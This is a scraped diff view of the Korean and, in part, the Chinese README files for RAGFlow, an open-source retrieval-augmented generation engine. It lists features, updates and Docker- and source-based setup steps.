|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<div align="center">
|
2 |
+
<a href="https://demo.ragflow.io/">
|
3 |
+
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
|
4 |
+
</a>
|
5 |
+
</div>
|
6 |
+
|
7 |
+
<p align="center">
|
8 |
+
<a href="./README.md">English</a> |
|
9 |
+
<a href="./README_zh.md">简体中文</a> |
|
10 |
+
<a href="./README_ja.md">日本語</a> |
|
11 |
+
<a href="./README_ko.md">한국어</a>
|
12 |
+
</p>
|
13 |
+
|
14 |
+
<p align="center">
|
15 |
+
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
16 |
+
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
17 |
+
</a>
|
18 |
+
<a href="https://demo.ragflow.io" target="_blank">
|
19 |
+
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
20 |
+
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
21 |
+
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
|
22 |
+
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
23 |
+
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
24 |
+
</a>
|
25 |
+
</p>
|
26 |
+
|
27 |
+
<h4 align="center">
|
28 |
+
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
29 |
+
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
30 |
+
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
31 |
+
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
32 |
+
<a href="https://demo.ragflow.io">Demo</a>
|
33 |
+
</h4>
|
34 |
+
|
35 |
+
|
36 |
+
## 💡 RAGFlow란?
|
37 |
+
|
38 |
+
[RAGFlow](https://ragflow.io/)는 심층 문서 이해에 기반한 오픈소스 RAG (Retrieval-Augmented Generation) 엔진입니다. 이 엔진은 대규모 언어 모델(LLM)과 결합하여 정확한 질문 응답 기능을 제공하며, 다양한 복잡한 형식의 데이터에서 신뢰할 수 있는 출처를 바탕으로 한 인용을 통해 이를 뒷받침합니다. RAGFlow는 규모에 상관없이 모든 기업에 최적화된 RAG 워크플로우를 제공합니다.
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
## 🎮 데모
|
43 |
+
데모를 [https://demo.ragflow.io](https://demo.ragflow.io)에서 실행해 보세요.
|
44 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
45 |
+
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
46 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
|
47 |
+
</div>
|
48 |
+
|
49 |
+
|
50 |
+
## 🔥 업데이트
|
51 |
+
|
52 |
+
- 2024-09-13 지식베이스 Q&A 검색 모드를 추가합니다.
|
53 |
+
|
54 |
+
- 2024-09-09 Agent에 의료상담 템플릿을 추가하였습니다.
|
55 |
+
|
56 |
+
- 2024-08-22 RAG를 통해 SQL 문에 텍스트를 지원합니다.
|
57 |
+
|
58 |
+
- 2024-08-02: [graphrag](https://github.com/microsoft/graphrag)와 마인드맵에서 영감을 받은 GraphRAG를 지원합니다.
|
59 |
+
|
60 |
+
- 2024-07-23: 오디오 파일 분석을 지원합니다.
|
61 |
+
|
62 |
+
- 2024-07-08: [Graph](./agent/README.md)를 기반으로 한 워크플로우를 지원합니다.
|
63 |
+
|
64 |
+
- 2024-06-27 Q&A 구문 분석 방식에서 Markdown 및 Docx를 지원하고, Docx 파일에서 이미지 추출, Markdown 파일에서 테이블 추출을 지원합니다.
|
65 |
+
|
66 |
+
- 2024-05-23: 더 나은 텍스트 검색을 위해 [RAPTOR](https://arxiv.org/html/2401.18059v1)를 지원합니다.
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
## 🌟 주요 기능
|
71 |
+
|
72 |
+
### 🍭 **"Quality in, quality out"**
|
73 |
+
- [심층 문서 이해](./deepdoc/README.md)를 기반으로 복잡한 형식의 비정형 데이터에서 지식을 추출합니다.
|
74 |
+
- 문자 그대로 무한한 토큰에서 "데이터 속의 바늘"을 찾아냅니다.
|
75 |
+
|
76 |
+
### 🍱 **템플릿 기반의 chunking**
|
77 |
+
- 똑똑하고 설명 가능한 방식.
|
78 |
+
- 다양한 템플릿 옵션을 제공합니다.
|
79 |
+
|
80 |
+
|
81 |
+
### 🌱 **할루시네이션을 줄인 신뢰할 수 있는 인용**
|
82 |
+
- 텍스트 청킹을 시각화하여 사용자가 개입할 수 있도록 합니다.
|
83 |
+
- 중요한 참고 자료와 추적 가능한 인용을 빠르게 확인하여 신뢰할 수 있는 답변을 지원합니다.
|
84 |
+
|
85 |
+
|
86 |
+
### 🍔 **다른 종류의 데이터 소스와의 호환성**
|
87 |
+
- 워드, 슬라이드, 엑셀, 텍스트 파일, 이미지, 스캔본, 구조화된 데이터, 웹 페이지 등을 지원합니다.
|
88 |
+
|
89 |
+
### 🛀 **자동화되고 손쉬운 RAG 워크플로우**
|
90 |
+
- 개인 및 대규모 비즈니스에 맞춘 효율적인 RAG 오케스트레이션.
|
91 |
+
- 구성 가능한 LLM 및 임베딩 모델.
|
92 |
+
- 다중 검색과 결합된 re-ranking.
|
93 |
+
- 비즈니스와 원활하게 통합할 수 있는 직관적인 API.
|
94 |
+
|
95 |
+
|
96 |
+
## 🔎 시스템 아키텍처
|
97 |
+
|
98 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
99 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
100 |
+
</div>
|
101 |
+
|
102 |
+
## 🎬 시작하기
|
103 |
+
### 📝 사전 준비 사항
|
104 |
+
- CPU >= 4 cores
|
105 |
+
- RAM >= 16 GB
|
106 |
+
- Disk >= 50 GB
|
107 |
+
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
108 |
+
> 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치](https://docs.docker.com/engine/install/)를 참조하세요.
|
109 |
+
|
110 |
+
|
111 |
+
### 🚀 서버 시작하기
|
112 |
+
|
113 |
+
1. `vm.max_map_count`가 262144 이상인지 확인하세요:
|
114 |
+
> `vm.max_map_count`의 값을 아래 명령어를 통해 확인하세요:
|
115 |
+
>
|
116 |
+
> ```bash
|
117 |
+
> $ sysctl vm.max_map_count
|
118 |
+
> ```
|
119 |
+
>
|
120 |
+
> 만약 `vm.max_map_count` 이 262144 보다 작다면 값을 재설정하세요.
|
121 |
+
>
|
122 |
+
> ```bash
|
123 |
+
> # 이 경우에 262144로 설정했습니다:
|
124 |
+
> $ sudo sysctl -w vm.max_map_count=262144
|
125 |
+
> ```
|
126 |
+
>
|
127 |
+
> 이 변경 사항은 시스템 재부팅 후에 초기화됩니다. 변경 사항을 영구적으로 적용하려면 /etc/sysctl.conf 파일에 vm.max_map_count 값을 추가하거나 업데이트하세요:
|
128 |
+
>
|
129 |
+
> ```bash
|
130 |
+
> vm.max_map_count=262144
|
131 |
+
> ```
|
132 |
+
|
133 |
+
2. 레포지토리를 클론하세요:
|
134 |
+
|
135 |
+
```bash
|
136 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
137 |
+
```
|
138 |
+
|
139 |
+
3. 미리 빌드된 Docker 이미지를 생성하고 서버를 시작하세요:
|
140 |
+
|
141 |
+
> 다음 명령어를 실행하면 *dev* 버전의 RAGFlow Docker 이미지가 자동으로 다운로드됩니다. 특정 Docker 버전을 다운로드하고 실행하려면, **docker/.env** 파일에서 `RAGFLOW_VERSION`을 원하는 버전으로 업데이트한 후, 예를 들어 `RAGFLOW_VERSION=v0.11.0`로 업데이트 한 뒤, 다음 명령어를 실행하세요.
|
142 |
+
```bash
|
143 |
+
$ cd ragflow/docker
|
144 |
+
$ chmod +x ./entrypoint.sh
|
145 |
+
$ docker compose up -d
|
146 |
+
```
|
147 |
+
|
148 |
+
> 기본 이미지는 약 9GB 크기이며 로드하는 데 시간이 걸릴 수 있습니다.
|
149 |
+
|
150 |
+
|
151 |
+
4. 서버가 시작된 후 서버 상태를 확인하세요:
|
152 |
+
|
153 |
+
```bash
|
154 |
+
$ docker logs -f ragflow-server
|
155 |
+
```
|
156 |
+
|
157 |
+
_다음 출력 결과로 시스템이 성공적으로 시작되었음을 확인합니다:_
|
158 |
+
|
159 |
+
```bash
|
160 |
+
____ ______ __
|
161 |
+
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
162 |
+
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
163 |
+
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
164 |
+
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
165 |
+
/____/
|
166 |
+
|
167 |
+
* Running on all addresses (0.0.0.0)
|
168 |
+
* Running on http://127.0.0.1:9380
|
169 |
+
* Running on http://x.x.x.x:9380
|
170 |
+
INFO:werkzeug:Press CTRL+C to quit
|
171 |
+
```
|
172 |
+
> 만약 확인 단계를 건너뛰고 바로 RAGFlow에 로그인하면, RAGFlow가 완전히 초기화되지 않았기 때문에 브라우저에서 `network abnormal` 오류가 발생할 수 있습니다.
|
173 |
+
|
174 |
+
5. 웹 브라우저에 서버의 IP 주소를 입력하고 RAGFlow에 로그인하세요.
|
175 |
+
> 기본 설정을 사용할 경우, `http://IP_OF_YOUR_MACHINE`만 입력하면 됩니다 (포트 번호는 제외). 기본 HTTP 서비스 포트 `80`은 기본 구성으로 사용할 때 생략할 수 있습니다.
|
176 |
+
6. [service_conf.yaml](./docker/service_conf.yaml) 파일에서 원하는 LLM 팩토리를 `user_default_llm`에 선택하고, `API_KEY` 필드를 해당 API 키로 업데이트하세요.
|
177 |
+
> 자세한 내용은 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)를 참조하세요.
|
178 |
+
|
179 |
+
_이제 쇼가 시작됩니다!_
|
180 |
+
|
181 |
+
## 🔧 설정
|
182 |
+
|
183 |
+
시스템 설정과 관련하여 다음 파일들을 관리해야 합니다:
|
184 |
+
|
185 |
+
- [.env](./docker/.env): `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, `MINIO_PASSWORD`와 같은 시스템의 기본 설정을 포함합니다.
|
186 |
+
- [service_conf.yaml](./docker/service_conf.yaml): 백엔드 서비스를 구성합니다.
|
187 |
+
- [docker-compose.yml](./docker/docker-compose.yml): 시스템은 [docker-compose.yml](./docker/docker-compose.yml)을 사용하여 시작됩니다.
|
188 |
+
|
189 |
+
[.env](./docker/.env) 파일의 변경 사항이 [service_conf.yaml](./docker/service_conf.yaml) 파일의 내용과 일치하도록 해야 합니다.
|
190 |
+
|
191 |
+
> [./docker/README](./docker/README.md) 파일에는 환경 설정과 서비스 구성에 대한 자세한 설명이 있으며, [./docker/README](./docker/README.md) 파일에 나열된 모든 환경 설정이 [service_conf.yaml](./docker/service_conf.yaml) 파일의 해당 구성과 일치하도록 해야 합니다.
|
192 |
+
|
193 |
+
기본 HTTP 서비스 포트(80)를 업데이트하려면 [docker-compose.yml](./docker/docker-compose.yml) 파일에서 `80:80`을 `<YOUR_SERVING_PORT>:80`으로 변경하세요.
|
194 |
+
|
195 |
+
> 모든 시스템 구성 업데이트는 적용되기 위해 시스템 재부팅이 필요합니다.
|
196 |
+
>
|
197 |
+
> ```bash
|
198 |
+
> $ docker compose up -d
|
199 |
+
> ```
|
200 |
+
|
201 |
+
## 🛠️ 소스에서 빌드하기
|
202 |
+
|
203 |
+
Docker 이미지를 소스에서 빌드하려면:
|
204 |
+
|
205 |
+
```bash
|
206 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
207 |
+
$ cd ragflow/
|
208 |
+
$ docker build -t infiniflow/ragflow:dev .
|
209 |
+
$ cd docker
|
210 |
+
$ chmod +x ./entrypoint.sh
|
211 |
+
$ docker compose up -d
|
212 |
+
```
|
213 |
+
|
214 |
+
|
215 |
+
## 🛠️ 소스에서 서비스 시작하기
|
216 |
+
|
217 |
+
서비스를 소스에서 시작하려면:
|
218 |
+
|
219 |
+
1. 레포지토리를 클론하세요:
|
220 |
+
|
221 |
+
```bash
|
222 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
223 |
+
$ cd ragflow/
|
224 |
+
```
|
225 |
+
|
226 |
+
2. 가상 환경을 생성하고, Anaconda 또는 Miniconda가 설치되어 있는지 확인하세요:
|
227 |
+
```bash
|
228 |
+
$ conda create -n ragflow python=3.11.0
|
229 |
+
$ conda activate ragflow
|
230 |
+
$ pip install -r requirements.txt
|
231 |
+
```
|
232 |
+
|
233 |
+
```bash
|
234 |
+
# CUDA 버전이 12.0보다 높은 경우, 다음 명령어를 추가로 실행하세요:
|
235 |
+
$ pip uninstall -y onnxruntime-gpu
|
236 |
+
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
237 |
+
```
|
238 |
+
|
239 |
+
3. 진입 스크립트를 복사하고 환경 변수를 설정하세요:
|
240 |
+
```bash
|
241 |
+
# 파이썬 경로를 받아옵니다:
|
242 |
+
$ which python
|
243 |
+
# RAGFlow 프로젝트 경로를 받아옵니다:
|
244 |
+
$ pwd
|
245 |
+
```
|
246 |
+
|
247 |
+
```bash
|
248 |
+
$ cp docker/entrypoint.sh .
|
249 |
+
$ vi entrypoint.sh
|
250 |
+
```
|
251 |
+
|
252 |
+
```bash
|
253 |
+
# 실제 상황에 맞게 설정 조정하기 (다음 두 개의 export 명령어는 새로 추가되었습니다):
|
254 |
+
# - `which python`의 결과를 `PY`에 할당합니다.
|
255 |
+
# - `pwd`의 결과를 `PYTHONPATH`에 할당합니다.
|
256 |
+
# - `LD_LIBRARY_PATH`가 설정되어 있는 경우 주석 처리합니다.
|
257 |
+
# - 선택 사항: Hugging Face 미러 추가.
|
258 |
+
PY=${PY}
|
259 |
+
export PYTHONPATH=${PYTHONPATH}
|
260 |
+
export HF_ENDPOINT=https://hf-mirror.com
|
261 |
+
```
|
262 |
+
|
263 |
+
4. 다른 서비스(MinIO, Elasticsearch, Redis, MySQL)를 시작하세요:
|
264 |
+
```bash
|
265 |
+
$ cd docker
|
266 |
+
$ docker compose -f docker-compose-base.yml up -d
|
267 |
+
```
|
268 |
+
|
269 |
+
5. 설정 파일을 확인하여 다음 사항을 확인하세요:
|
270 |
+
- **docker/.env**의 설정이 **conf/service_conf.yaml**의 설정과 일치하는지 확인합니다.
|
271 |
+
- **service_conf.yaml**의 관련 서비스에 대한 IP 주소와 포트가 로컬 머신의 IP 주소와 컨테이너에서 노출된 포트와 일치하는지 확인합니다.
|
272 |
+
|
273 |
+
|
274 |
+
6. RAGFlow 백엔드 서비스를 시작합니다:
|
275 |
+
|
276 |
+
```bash
|
277 |
+
$ chmod +x ./entrypoint.sh
|
278 |
+
$ bash ./entrypoint.sh
|
279 |
+
```
|
280 |
+
|
281 |
+
7. 프론트엔드 서비스를 시작합니다:
|
282 |
+
|
283 |
+
```bash
|
284 |
+
$ cd web
|
285 |
+
$ npm install --registry=https://registry.npmmirror.com --force
|
286 |
+
$ vim .umirc.ts
|
287 |
+
# proxy.target을 http://127.0.0.1:9380로 업데이트합니다.
|
288 |
+
$ npm run dev
|
289 |
+
```
|
290 |
+
|
291 |
+
8. 프론트엔드 서비스를 배포합니다:
|
292 |
+
|
293 |
+
```bash
|
294 |
+
$ cd web
|
295 |
+
$ npm install --registry=https://registry.npmmirror.com --force
|
296 |
+
$ umi build
|
297 |
+
$ mkdir -p /ragflow/web
|
298 |
+
$ cp -r dist /ragflow/web
|
299 |
+
$ apt install nginx -y
|
300 |
+
$ cp ../docker/nginx/proxy.conf /etc/nginx
|
301 |
+
$ cp ../docker/nginx/nginx.conf /etc/nginx
|
302 |
+
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
|
303 |
+
$ systemctl start nginx
|
304 |
+
```
|
305 |
+
|
306 |
+
## 📚 문서
|
307 |
+
|
308 |
+
- [Quickstart](https://ragflow.io/docs/dev/)
|
309 |
+
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
310 |
+
- [References](https://ragflow.io/docs/dev/category/references)
|
311 |
+
- [FAQ](https://ragflow.io/docs/dev/faq)
|
312 |
+
|
313 |
+
## 📜 로드맵
|
314 |
+
|
315 |
+
[RAGFlow 로드맵 2024](https://github.com/infiniflow/ragflow/issues/162)을 확인하세요.
|
316 |
+
|
317 |
+
## 🏄 커뮤니티
|
318 |
+
|
319 |
+
- [Discord](https://discord.gg/4XxujFgUN7)
|
320 |
+
- [Twitter](https://twitter.com/infiniflowai)
|
321 |
+
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
322 |
+
|
323 |
+
## 🙌 컨트리뷰션
|
324 |
+
|
325 |
+
RAGFlow는 오픈소스 협업을 통해 발전합니다. 이러한 정신을 바탕으로, 우리는 커뮤니티의 다양한 기여를 환영합니다. 참여하고 싶으시다면, 먼저 [가이드라인](./docs/references/CONTRIBUTING.md)을 검토해 주세요.
|
README_zh.md
ADDED
@@ -0,0 +1,329 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<div align="center">
|
2 |
+
<a href="https://demo.ragflow.io/">
|
3 |
+
<img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
|
4 |
+
</a>
|
5 |
+
</div>
|
6 |
+
|
7 |
+
<p align="center">
|
8 |
+
<a href="./README.md">English</a> |
|
9 |
+
<a href="./README_zh.md">简体中文</a> |
|
10 |
+
<a href="./README_ja.md">日本語</a> |
|
11 |
+
<a href="./README_ko.md">한국어</a>
|
12 |
+
</p>
|
13 |
+
|
14 |
+
<p align="center">
|
15 |
+
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
16 |
+
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
17 |
+
</a>
|
18 |
+
<a href="https://demo.ragflow.io" target="_blank">
|
19 |
+
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
20 |
+
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
21 |
+
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
|
22 |
+
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
23 |
+
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
24 |
+
</a>
|
25 |
+
</p>
|
26 |
+
|
27 |
+
<h4 align="center">
|
28 |
+
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
29 |
+
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
30 |
+
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
31 |
+
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
32 |
+
<a href="https://demo.ragflow.io">Demo</a>
|
33 |
+
</h4>
|
34 |
+
|
35 |
+
## 💡 RAGFlow 是什么?
|
36 |
+
|
37 |
+
[RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
|
38 |
+
|
39 |
+
## 🎮 Demo 试用
|
40 |
+
|
41 |
+
请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
|
42 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
43 |
+
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
44 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
|
45 |
+
</div>
|
46 |
+
|
47 |
+
|
48 |
+
## 🔥 近期更新
|
49 |
+
|
50 |
+
- 2024-09-13 增加知识库问答搜索模式。
|
51 |
+
- 2024-09-09 在 Agent 中加入医疗问诊模板。
|
52 |
+
- 2024-08-22 支持用RAG技术实现从自然语言到SQL语句的转换。
|
53 |
+
- 2024-08-02 支持 GraphRAG 启发于 [graphrag](https://github.com/microsoft/graphrag) 和思维导图。
|
54 |
+
- 2024-07-23 支持解析音频文件。
|
55 |
+
- 2024-07-08 支持 Agentic RAG: 基于 [Graph](./agent/README.md) 的工作流。
|
56 |
+
- 2024-06-27 Q&A 解析方式支持 Markdown 文件和 Docx 文件,支持提取出 Docx 文件中的图片和 Markdown 文件中的表格。
|
57 |
+
- 2024-05-23 实现 [RAPTOR](https://arxiv.org/html/2401.18059v1) 提供更好的文本检索。
|
58 |
+
|
59 |
+
## 🌟 主要功能
|
60 |
+
|
61 |
+
### 🍭 **"Quality in, quality out"**
|
62 |
+
|
63 |
+
- 基于[深度文档理解](./deepdoc/README.md),能够从各类复杂格式的非结构化数据中提取真知灼见。
|
64 |
+
- 真正在无限上下文(token)的场景下快速完成大海捞针测试。
|
65 |
+
|
66 |
+
### 🍱 **基于模板的文本切片**
|
67 |
+
|
68 |
+
- 不仅仅是智能,更重要的是可控可解释。
|
69 |
+
- 多种文本模板可供选择。
|
70 |
+
|
71 |
+
### 🌱 **有理有据、最大程度降低幻觉(hallucination)**
|
72 |
+
|
73 |
+
- 文本切片过程可视化,支持手动调整。
|
74 |
+
- 有理有据:答案提供关键引用的快照并支持追根溯源。
|
75 |
+
|
76 |
+
### 🍔 **兼容各类异构数据源**
|
77 |
+
|
78 |
+
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。
|
79 |
+
|
80 |
+
### 🛀 **全程无忧、自动化的 RAG 工作流**
|
81 |
+
|
82 |
+
- 全面优化的 RAG 工作流可以支持从个人应用乃至超大型企业的各类生态系统。
|
83 |
+
- 大语言模型 LLM 以及向量模型均支持配置。
|
84 |
+
- 基于多路召回、融合重排序。
|
85 |
+
- 提供易用的 API,可以轻松集成到各类企业系统。
|
86 |
+
|
87 |
+
## 🔎 系统架构
|
88 |
+
|
89 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
90 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
91 |
+
</div>
|
92 |
+
|
93 |
+
## 🎬 快速开始
|
94 |
+
|
95 |
+
### 📝 前提条件
|
96 |
+
|
97 |
+
- CPU >= 4 核
|
98 |
+
- RAM >= 16 GB
|
99 |
+
- Disk >= 50 GB
|
100 |
+
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
101 |
+
> 如果你并没有在本机安装 Docker(Windows、Mac,或者 Linux), 可以参考文档 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安装。
|
102 |
+
|
103 |
+
### 🚀 启动服务器
|
104 |
+
|
105 |
+
1. 确保 `vm.max_map_count` 不小于 262144:
|
106 |
+
|
107 |
+
> 如需确认 `vm.max_map_count` 的大小:
|
108 |
+
>
|
109 |
+
> ```bash
|
110 |
+
> $ sysctl vm.max_map_count
|
111 |
+
> ```
|
112 |
+
>
|
113 |
+
> 如果 `vm.max_map_count` 的值小于 262144,可以进行重置:
|
114 |
+
>
|
115 |
+
> ```bash
|
116 |
+
> # 这里我们设为 262144:
|
117 |
+
> $ sudo sysctl -w vm.max_map_count=262144
|
118 |
+
> ```
|
119 |
+
>
|
120 |
+
> 你的改动会在下次系统重启时被重置。如果希望做永久改动,还需要在 **/etc/sysctl.conf** 文件里把 `vm.max_map_count` 的值再相应更新一遍:
|
121 |
+
>
|
122 |
+
> ```bash
|
123 |
+
> vm.max_map_count=262144
|
124 |
+
> ```
|
125 |
+
|
126 |
+
2. 克隆仓库:
|
127 |
+
|
128 |
+
```bash
|
129 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
130 |
+
```
|
131 |
+
|
132 |
+
3. 进入 **docker** 文件夹,利用提前编译好的 Docker 镜像启动服务器:
|
133 |
+
|
134 |
+
```bash
|
135 |
+
$ cd ragflow/docker
|
136 |
+
$ chmod +x ./entrypoint.sh
|
137 |
+
$ docker compose -f docker-compose-CN.yml up -d
|
138 |
+
```
|
139 |
+
|
140 |
+
